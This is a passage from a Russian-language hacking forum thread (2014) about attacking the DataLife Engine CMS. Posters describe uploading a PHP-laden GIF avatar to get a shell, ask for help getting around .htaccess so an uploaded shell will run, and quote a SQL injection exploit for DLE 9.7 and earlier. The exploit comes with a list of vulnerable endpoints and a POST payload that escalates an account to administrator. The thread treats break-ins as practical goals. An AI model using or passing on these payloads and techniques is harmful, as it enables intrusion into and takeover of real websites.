HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 06.02.2014, 19:09
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Исполнение кода в аве через ajax? Вы про эту?
 
Ответить с цитированием

  #322  
Старый 06.02.2014, 21:50
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от b3  
b3 said:
Исполнение кода в аве через ajax? Вы про эту?
она самая
 
Ответить с цитированием

  #323  
Старый 08.02.2014, 00:02
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

1. Php код встраивается в гифку и заливается в качестве аватарки.

2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.

3. При прочтении сообщения запустится шелл.

с серча
 
Ответить с цитированием

  #324  
Старый 08.02.2014, 18:04
lansia
Guest
Сообщений: n/a
Провел на форуме:
42267

Репутация: 5
По умолчанию

Цитата:
Сообщение от hpol  
hpol said:
1. Php код встраивается в гифку и заливается в качестве аватарки.
2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.
3. При прочтении сообщения запустится шелл.
с серча
А как залить гифку с кодом php через аватар?Пишет что невозможно залить (debug mode).Проверил много Dle , не льется.
 
Ответить с цитированием

  #325  
Старый 11.02.2014, 18:29
mr.Arec
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Кто может помочь с удалением .htaccess в DLE 10.1

есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
 
Ответить с цитированием

  #326  
Старый 11.02.2014, 19:05
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от mr.Arec  
mr.Arec said:
Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
а как же вы его залили? через загрузку файлов?
 
Ответить с цитированием

  #327  
Старый 12.02.2014, 04:17
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от mr.Arec  
mr.Arec said:
Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess
здесь вопрос простой: если сервер работает на голом апач и права на файл .htaccess 444, ничего не выйдет. Нужен или фтп, или "сосед" или заливка туда, где нет запрета на пхп (нет хтаксс)

а вот, например, апач + мод_реврайт (как многие любят, типы быстро), группа вэб имеет права по умолчанию на запись в диры и файлы. потому и убить его можно, методами описанными выше (или через /inc/files.php (вопрос версии) или через анимашку)
 
Ответить с цитированием

  #328  
Старый 13.02.2014, 18:11
mr.Arec
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Цитата:
Сообщение от chekist  
chekist said:
а как же вы его залили? через загрузку файлов?
через сторонний модуль
 
Ответить с цитированием

  #329  
Старый 13.02.2014, 23:12
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

slva2000 с версии 9.7 уже не робит

mr.Arec чё за модуль?
 
Ответить с цитированием

  #330  
Старый 17.02.2014, 20:47
FreddieVR
Guest
Сообщений: n/a
Провел на форуме:
1511

Репутация: 0
По умолчанию

Цитата:
Сообщение от SecondLife  
SecondLife said:
SQL injection 0day и получение админки для 9.7 и младше
Requirements:
Код:
Code:
user account
register_globals on
magic_quotes_gpc off
Файл - максимальная версия скрипта
Код:
Code:
/engine/ajax/adminfunction.php			9.6
/engine/ajax/allvotes.php			9.7
/engine/ajax/antivirus.php			9.7
/engine/ajax/clean.php				9.7
/engine/ajax/complaint.php			9.6
/engine/ajax/deletecomments.php			9.7
/engine/ajax/find_relates.php			9.7
/engine/ajax/message.php			9.7
/engine/ajax/newsletter.php			9.7
/engine/ajax/pm.php				9.7
/engine/ajax/poll.php				9.7
/engine/ajax/rebuild.php			9.7
/engine/ajax/rss.php				9.7
/engine/ajax/search.php				9.7
/engine/ajax/sitemap.php			9.7
/engine/ajax/templates.php			9.7
/engine/ajax/typograf.php			9.7
/engine/ajax/upload.php				9.7
/engine/ajax/vote.php				9.7
Request
Код:
Code:
POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit
PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set hash='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$hash[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', lastdate='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_TIME[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', logged_ip='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' WHERE user_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR] 
(c) SecondLife
Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ